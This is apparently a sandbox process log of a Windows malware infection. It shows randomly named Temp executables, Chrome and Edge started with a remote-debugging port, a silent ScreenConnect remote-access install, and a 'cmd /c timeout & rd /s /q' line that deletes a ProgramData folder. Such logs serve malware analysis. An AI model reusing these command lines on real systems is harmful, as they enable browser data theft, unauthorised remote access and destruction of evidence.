"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4980 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3088 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5312 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5012,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5368 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6124 -ip 6124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb9ca146f8,0x7ffb9ca14708,0x7ffb9ca14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2560 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2304 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3752 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 968

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\s268q" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1200B3204BB315F08E8EC7D17599F7B1 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240674562 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

